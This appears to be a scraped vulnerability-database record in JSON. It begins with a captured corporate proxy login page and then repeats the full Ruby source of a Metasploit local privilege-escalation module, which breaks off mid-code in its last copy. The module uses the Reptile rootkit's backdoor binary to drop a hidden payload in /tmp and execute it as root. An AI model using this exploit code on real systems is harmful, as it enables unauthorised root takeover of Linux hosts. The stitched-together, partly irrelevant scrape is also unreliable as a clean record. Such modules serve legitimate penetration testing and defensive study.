#696A6D; font-weight: normal;}.eu_co { font-size: 14px; color: #696A6D; white-space: normal; padding: 0 20px;}.eu_co.bsubmit { padding: 0 20px 20px 20px;}.eu_l { width: 500px; overflow: hidden; text-overflow: ellipsis; margin: 0 auto; line-height: normal;}.eu_l a { color: #0069AA; word-break: break-word;}.bh { min-height: 40px; display: block; max-height: 80px; color: #0076A9; font-size: 32px; overflow: hidden; padding-bottom: 15px;}.btn { background: #009dd0; color: #FFFFFF; border-radius: 5px; border: 2px solid #009dd0; cursor: pointer; display: inline-block; height: 30px; margin: 15px 0 15px; font-size: 18px; line-height: 26px; width: auto; padding: 0 20px;}.btn:focus, input:focus { outline: none;}.btn:hover { background: #fff; color: #0076A9;}.fo { height: 40px; line-height: 40px; font-size: 11px; padding-bottom: 0px; background-color: #f3f3f3; width: 100%; border-bottom-left-radius: 7px; border-bottom-right-radius: 7px; padding-left: 25px;}.ln { font-size: 13px; padding: 0 0 35px; font-style: italic;}.pb20 { padding-bottom: 20px;}.pb35 { padding-bottom: 35px;}.eu_co.st { font-size: 12px; padding: 10px 0; line-height: 20px; position: relative;}.ie-label { display: none;}.w-sp { -webkit-animation: spinner .8s linear infinite; animation: spinner .8s linear infinite; border: 2.5px solid #c6c6c6; border-radius: 100%; display: inline-block; height: 13px; position: relative; width: 13px; vertical-align: middle; top: -2px; margin-right: 6px;}.w-sp.grn { border-top-color: #399c1d;}.w-sp.gry { border-top-color: #77797c;}@-webkit-keyframes spinner { to { -webkit-transform: rotate(360deg); }}@keyframes spinner { to { transform: rotate(360deg); }}.not { color: #fd4239; font-size: 16px; padding-left: 0; padding-top: 0;}.demo-icon { color: green;}.s_img { vertical-align: bottom; padding-right: 5px; background: url(\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADoAAAAMCAYAAAAzmK6YAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTExIDc5LjE1ODMyNSwgMjAxNS8wOS8xMC0wMToxMDoyMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6MDg4M0FBNkZBODFFMTFFNUI3RkJGMDcxMjM1MjFGQjUiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6MDg4M0FBNzBBODFFMTFFNUI3RkJGMDcxMjM1MjFGQjUiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDowODgzQUE2REE4MUUxMUU1QjdGQkYwNzEyMzUyMUZCNSIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDowODgzQUE2RUE4MUUxMUU1QjdGQkYwNzEyMzUyMUZCNSIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PkDA4BkAAANHSURBVHja1JZpSBVhFIaveevaQpGRqaVkC5UWSiutkCVtRlaWtlhRli3+CPtREBFFBUULoVBhEYVYtEALEgZmC4ZEJBFEciuznVKIdjW098BzZbqo+c/64HGcmW++Oed873nnBjQ0NLhs5OTkuJoY8WK5GCn6CI94K26Io+K+6x8ZmZmZLd53+51bMtGiXswXax33noqzokh8FJ/aOLcBxPm8NZPd7GZnHXaLZaK735wf4oJ4IdqLUHGzjZO0OArEF9T21xGQnZ3tIZHEZuZY1b6LR2IvCY8WE0WEqBGPxUVR4nhukujL83X2LlEh7ok5Ik68F1doB1+rjBNV4hL3O4kkMYh5l0UHUSnyRJoYIyazKVcl48Zd1ibavTBLNIN+a258FltYdIVYSUXtehBS9zB3s9jH/ydEMhKPINGD9lIxTbwRw8QzMZwiWqtUix5Ici7rDCGxaIp5TJwWS0VvnrV26kkxRhBjHgUvaac/i1pI8rWYKo6ICSQ3Wwyl8hZglBWO+Sb/GP5fQ8Db2dXzwsv7TEFTRCpKyCTJdRRlFV5gwW4TY8USUS66ivHiJ3MtyR0ikneFiwSSNFmnmCJsR58gC/9RzQNlrewb25l+YrE4w7VNYr84LDaKWBKwAnwT18QukSu6NRGHyXuro3i2sycpboiw2OfRVr9YwzwkG3VlScaHfGZU3kyiWY4kB4uZ9GYves5c+DbHGSRZKx6KQF6WhtxPOdY1OfanT5NZz86LHXNCkHgRMaRwXihe4Se3xED6Pp3WiCCG6axT7HTdA2IWwfnGHXogCjksFB39CpGA1Hyjgl72Yhi25nURzK6Y7K26D8QGkkliV0OR8mp2MRkzCsboInnWVPOSXrzLMYZet4KtRyFxKNLb6Lr2g0HOlMpCoVy3Pvog8lmgpVGJQZmbfuWlBbhxIK7ppo/MODJwTTOP42KPWECvheHqO9m9c2IUPV5KL8dT0EQ+hbmo6R1ml8/nr1SyTf8jUWw4HL2HYBCFrUjSi6zK/L7NboLzjXaYh4vggqh4rWOOfcu7UOAGx/VQnvX9QAni6FvPw5rVSqxOeQQwp0bn9U0l6p9ELK7lwXnjcLw6ql7AZ6nqf/gJ+FuAAQDyhegdUpDo7QAAAABJRU5ErkJggg==\") no-repeat; width: 55px; height: 17px; display: inline-block;}.f_btn + .f_btn { margin-left: 5px;}.f_btn { display: inline-block;}.arrow-box { padding: 15px; position: absolute; background: white; text-align: left; line-height: 16px; width: 295px; top: -40px; display: none; z-index: 10; border: 1px solid #c2a200; border-radius: 5px; padding: 15px; color: #c2a200; font-size: 13px;}.arrow-box li { list-style-type: none; color: #2a2c30;}.arrow-box-left { top: -10px; left: -335px;}.arrow-box-left:after, .arrow-box-left:before { left: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute;}.arrow-box-left:after { border-color: transparent; border-left-color: #FFFFFF; border-width: 5px; margin-top: -34px;}.arrow-box-left:before { border-color: transparent; border-left-color: #c2a200; border-width: 6px; margin-top: -35px;}.arrow-box-right { right: -335px; top: -20px;}.arrow-box-right:after, .arrow-box-right:before { right: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; pointer-events: none;}.arrow-box-right:after { border-color: transparent; border-right-color: #FFFFFF; border-width: 5px; margin-top: -24px;}.arrow-box-right:before { border-color: transparent; border-right-color: #c2a200; border-width: 6px; margin-top: -25px;}.input-wrapper { height: 30px; line-height: 30px; margin-bottom: 10px; border: 1px solid #b0b0b0; position: relative; display: block; width: inherit; padding-left: 10px;}.input-wrapper div.input-wrapper-div-text { text-align: left; color: #b0b0b0; max-width: 334px; overflow: hidden; text-overflow: ellipsis;}.input-image { width: 17px; display: inline-block; vertical-align: middle; height: auto; float: left; position: absolute; top: 5px; width: 20px; height: 20px; left: 7px;}.input-wrapper.dotted-border { border: none; border-bottom: 1px dotted #77797C;}.error-content { overflow-y: auto; height: auto;}.error-content li { list-style-type: none;}.text-label-link { height: 32px; line-height: 32px; margin-bottom: 10px; text-align: left; padding-left: 10px; position: absolute; top: 0px; right: -100px;}.text-label-link.pwd { right: -140px;}.text-label-link:before { content: \"<<\"; letter-spacing: -0.15em; padding-right: 2px; font-size: 8px; line-height: 11px; color: #3892B8; vertical-align: middle;}.username { width: calc(100% -35px); display: inline-block; vertical-align: top; color: #424242; position: relative; overflow: hidden;}.button-link { width: auto; height: auto; background: none; color: #0076A9; text-decoration: underline; cursor: pointer; vertical-align: middle;}.hide { display: none;}.err-tri { width: 0; height: 0; border-top: 15px solid transparent; border-bottom: 15px solid transparent; position: absolute; top: 40px;}.err-tri-to-left { border-right: 15px solid #FF9130; left: -15px;}.err-tri-to-right { border-left: 15px solid #FF9130; right: -15px;}.err-tri-new { display: none; -ms-transform: rotate(45deg); -webkit-transform: rotate(45deg); transform: rotate(45deg); width: 16px; height: 16px; /*right: -9px; top: 47px;*/ right: -14px; top: 6px; position: absolute; border: 1px solid #c2a200;}.username_placeholder { font: 14px/normal sans-serif; left: 7px; top: 8px; width: 332px; height: 20px; position: absolute; overflow-x: hidden; font-size-adjust: none; font-stretch: normal; text-align: left; color: #939393;}.username_input { position: relative; top: 6px; height: 20px; left: -27px; z-index:15;}input.username_input { width: 295px;}.table-left-column, .table-right-column { width: 50%; display: inline-block;}.table-left-column table { padding-right: 10px;}.table-right-column table { padding-left: 10px;}.separator { height: 14px; margin-left: 8px; margin-right: 8px; border-left: 1px #cfd0d1 solid;}hr { background-color: #cfd0d1; margin-top: 16px; margin-bottom: 16px;}.eu_sh { font-size: 16px; color: #929496; vertical-align: middle; padding: 10px 20px 0 23px;}.eu_h_t { padding-left: 23px; font-size: 16px; color: #2a2c30;}.eu_h_t span { color: #009dd0;}.eu_co_aup_txt { font-size: 13px; color: #2a2c30; padding: 0 20px 0 23px;}.eu_co_aup_txt div { max-width:715px; word-wrap: break-word; overflow-x: hidden;}.eu_h_t_sub { font-size: 16px; color: #77797c; padding: 0 0 0 23px; display: inline-block; padding-bottom: 15px; margin-right: -15px;}.eu_h_t_sub_a { padding-left: 0; padding-bottom: 15px; display: inline-block; text-align: left;}.eu_h_t_sub_a a { font-size: 16px; color: #009dd0; padding: 0 0 0 23px; width: 215px;}.otp { background-color: white; padding-left: 0; padding-top: 16px; font-size:11px;}@media only screen and (max-width:640px) { .eu_l { width: 250px; } .input-wrapper { width: 100%; } .arrow-box { background: #FFFFFF; border: 1px solid #c2a200; width: 524px; } .arrow-box-right { top: -140px; left: -1px; } .arrow-box-left { top: -80px; left: -3px; } .arrow-box-left:after, .arrow-box-left:before, .arrow-box-right:after, .arrow-box-right:before { top: 117%; left: 48%; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; } .arrow-box-right:after { border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -20px; } .arrow-box-right:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -20px; } .arrow-box-left:after { border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -9px; } .arrow-box-left:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -9px; } .text-label-link, .text-label-link.pwd { right: 0; top: 25px; } .table-left-column, .table-right-column { width: 100%; display: block; } .table-left-column table, .table-right-column table { padding-left: 0; padding-right: 0; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; }}@media only screen and (max-width: 480px) { .table-half-column-fixed { width: inherit; } input.username_input { left: -2px; width: 100%; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; } .m_tbl { min-width: 300px; } .pg_cont { position: relative; left: -3px; } .fo { text-align: center; }}</style><style type=\"text/css\">.bh.bh-scaled {overflow:visible;}</style><!--[if lte IE 7]><style type=\"text/css\">.act-icon {display: none;}</style><![endif]--><!--[if lte IE 7]><style type=\"text/css\">.ie-label {position: absolute;left: 5px;top: 10px;display: block;}.username_input {position: relative;top: 5px;height: 20px;left: -27px;}.username_placeholder {left: 7px;}</style><![endif]--><!--[if lte IE 8]><style type=\"text/css\">.table-left-column, .table-right-column {width: 100%;display: block;}.table-left-column table, .table-right-column table {padding-left: 0;padding-right: 0;}.arrow-box {background: white;border: 1px solid #c2a200;width: 95%;z-index: 100;}.arrow-box-right {top: -140px;left: -1px;}.arrow-box-left {top: -80px;left: 2px;}.arrow-box-left:after, .arrow-box-left:before,.arrow-box-right:after, .arrow-box-right:before {top: 117%;left: 48%;border: solid transparent;content: \" \";height: 0;width: 0;position: absolute;}.arrow-box-right:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -20px;}.arrow-box-right:before {border-color: transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -20px;}.arrow-box-left:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -9px;}.arrow-box-left:before {border-color: transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -9px;}</style><![endif]--><!--link href=\"/chf.css\" rel=stylesheet type=\"text/css\"--><script language=\"JavaScript\" type=\"text/JavaScript\">function getIEVersion() {var myNav = navigator.userAgent.toLowerCase();return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;}function validate(myform) {myform.lognsfc.value = myform.lognsfc.value.trim();var ln = myform.lognsfc.value;var error = document.getElementById(\"error-text\");if (ln == \"\") {error.style.display = \"block\";error.innerHTML = \"Please enter a login name in the form of an email address\";return false;}if (!ln.match('^([0-9a-zA-Z $#!%&amp;\\'*+-/=?^_`{|}~]+[-._+&amp;])*[0-9a-zA-Z $#!%&amp;\\'*+-/=?^_`{|}~]+@([-_0-9a-zA-Z]+[.])+[a-zA-Z]{2,16}$')) {error.style.display = \"block\";error.innerHTML = \"The Login ID must be a valid email address\";return false;}error.style.display = \"none\";return true;}function delcookie(name) {document.cookie = name + '=1; expires=Thu, 01-Jan-70 00:00:01 GMT;';}function delete_fchcookie() {delcookie(\"_sm__fch\");}</script></head><body onload=\"delete_fchcookie()\"><div id=\"main-page\" class=\"pg gr\"><div class=\"pg_cont\"><!-- --><div id=\"flashform\" style=\"display:block;\"><form name=\"uform\" method=\"post\" action=\"https://login.zscalerone.net:443/sfc__lu\" id=\"uform\"><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td class=\"bh bh-scaled\"><span id=\"cmpy_info\">tuxguy.org</span></td></tr></table><input type=\"hidden\" name=\"urlosfc\" size=\"25\" value=\"origurl=https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb&amp;wexps=1&amp;_ordtok=H0Z3WVZMbQmmJZq5sFDHM76Qsn&amp;wexps=1\"><input type=\"hidden\" name=\"urlodmn\" size=\"25\" value=\"https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb\"><input type=\"hidden\" name=\"jscript\" size=\"4\" value=\"0set\"><table class=\"m_tbl\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\"><tbody><tr><td valign=\"top\"><table class=\"table-upper\" width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" class=\"eu_h\"><img class=\"act-icon\"src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAABMklEQVR4nK3UvytFYRzH8RcpKUrEIP4ApRQZ/EjJJMpgltSVbsqsJP+DQcSosBgNLDYWGSyKBQObLGLBcM7Rudd57uXyns5znud5f7/POZ9z+Geqkov+7Y6s+WbMoxfPOMEO3osXnubuQU2JYoM4QGvq3izmMBEX+EZ1QNaIvSJZwhDWQl2EhONoD23CNBp+I+wqISN69p2/EV6XEQbXhISHeCohC86HhI+iN/qaMXeDXKhSsbAFG7hCHwawhQtRBlcxhU2cY1EqyxTmsBbH6I7Hy8hjNxbUxwVWU430xE2sZAlnUrKEJiyEjhezhHU8UHjkyTIbQ9RgLBmkhSMVCmE0S1j3B2FblvAvfH2GaWGpIJfjMkuYx1sFsjtRlFAYm32cYVj0Yy3HB25xhJcKGvkZn2rqLv61XgGbAAAAAElFTkSuQmCC\">Sign In</td></tr><tr><td align=\"left\" class=\"eu_sh\">To keep you safe from internet threats, please sign in to your company's security service.<hr></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" width=\"100%\" style=\"width:100%;\"><div class=\"table-half-column-fixed\"><table width=\"100%\" class=\"table-field-label\" cellspacing=\"0\"cellpadding=\"0\"><tr><td align=\"left\" class=\"td-field-label\">User Name</td></tr></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"class=\"table-field-input\"><tr><td style=\"position: relative;\"><div class=\"input-wrapper\"><input id=\"username_input\" class=\"input username_input\" name=\"lognsfc\" value=\"\" type=\"text\" autofocus=\"true\"><label id=\"username_placeholder\" class=\"username_placeholder\" for=\"username_input\">Enter your User Name...</label></div></td></tr></table></div></td></tr></tbody></table></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td align=\"left\" id=\"error-text\" class=\"eu_h sm not\" style=\"display: none;\"></td></tr></table></td></tr><tr><td class=\"eu_co\" class=\"bsubmit\" align=\"left\"><table cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tbody><tr><td width=\"50%\" style=\"width: 50%;\" align=\"left\"><input type=\"submit\" name=\"lsubmit\" class=\"btn\" value=\"Sign In\"onclick=\"return validate(this.form);\"></td><td width=\"50%\" style=\"width: 50%;\" align=\"right\"></td></tr></tbody></table></td></tr></tbody></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"table-lower\"><tr><td class=\"eu_co fo\" align=\"left\">Need help? Contact our support team at +91-9000000000 <span class=\"separator\"></span><a href=\"mailto:support@tuxguy.org\">support@tuxguy.org</a>.</td><td class=\"eu_co\"></td></tr></table></td></tr></tbody></table><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td></td></tr></tbody></table></form></div></div></div><script language=\"Javascript\" type=\"text/javascript\">if (document.forms && document.forms[0] && document.forms[0].jscript) {document.forms[0].jscript.value = \"1set\";}var placeholder = document.getElementById('username_placeholder');var input_field = document.getElementsByName('lognsfc')[0];var userNamePlaceHolderText = 'Enter your User Name...';placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;if (window.attachEvent) {input_field.attachEvent('onkeyup', function(e) {if (!e.srcElement.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}else {input_field.addEventListener('keyup', function(e) {if (!e.target.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}setTimeout(function() {var companyLogoImgEl = document.getElementById(\"cmpy_info\");if (companyLogoImgEl) {var theImage = new Image();if(window.attachEvent) {theImage.src = companyLogoImgEl.src;companyLogoImgEl.attachEvent('onmouseover', function(e) {companyLogoImgEl.style.msTransform = \"scale(2)\";});companyLogoImgEl.attachEvent('onmouseout', function(e) {companyLogoImgEl.style.msTransform = \"scale(1)\";});}else if(window.addEventListener){theImage.src = companyLogoImgEl.src;companyLogoImgEl.addEventListener('mouseover', function(e) {companyLogoImgEl.style.transform = \"scale(2)\";});companyLogoImgEl.addEventListener('mouseout', function(e) {companyLogoImgEl.style.transform = \"scale(1)\";});}}}, 200);</script></body></html>", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-19T02:19:50", "differentElements": ["modified", "published", "sourceData"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-19T12:25:21", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "ubuntu", "idList": ["USN-4284-1", "USN-4286-2", "USN-4287-2", "USN-4285-1"]}, {"type": "threatpost", "idList": ["THREATPOST:62DB17374DCB079A8FC0B6E7CCCB723B", "THREATPOST:815A85AC4471792F2F220EAD5DD49460"]}, {"type": "redhat", "idList": ["RHSA-2020:0543"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:82D5B9376455E3F4C57E94B709E5F38D", "IMPERVABLOG:45672A29BD5190109067ACF0793539C6"]}, {"type": "cve", "idList": ["CVE-2013-2679", "CVE-2020-9264"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9121787340B5AC709E5CB77061C0A6DA"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:9D74A0280612C873662F0DD613EE4C32"]}, {"type": "thn", "idList": ["THN:9994A9D5CFB76851BB74C8AD52F3DBBE"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0540", "ELSA-2020-0515", "ELSA-2020-0520"]}, {"type": "ics", "idList": ["ICSMA-20-049-02"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156396"]}], "modified": "2020-02-19T12:25:21"}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-02-19T12:25:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-19T12:25:21", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-19T20:03:20", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:CDD479681D16E5E813A006B44143393D", "THREATPOST:62DB17374DCB079A8FC0B6E7CCCB723B"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0233-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156409", "PACKETSTORM:156410"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0540", "ELSA-2020-0550", "ELSA-2020-0541"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704627", "OPENVAS:1361412562310892108", "OPENVAS:1361412562310704626", "OPENVAS:1361412562310892107"]}, {"type": "ubuntu", "idList": ["USN-4284-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:48094"]}, {"type": "redhat", "idList": ["RHSA-2020:0543"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:82D5B9376455E3F4C57E94B709E5F38D"]}, {"type": "cve", "idList": ["CVE-2013-2679"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9121787340B5AC709E5CB77061C0A6DA"]}], "modified": "2020-02-19T20:03:20"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-02-19T20:03:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n 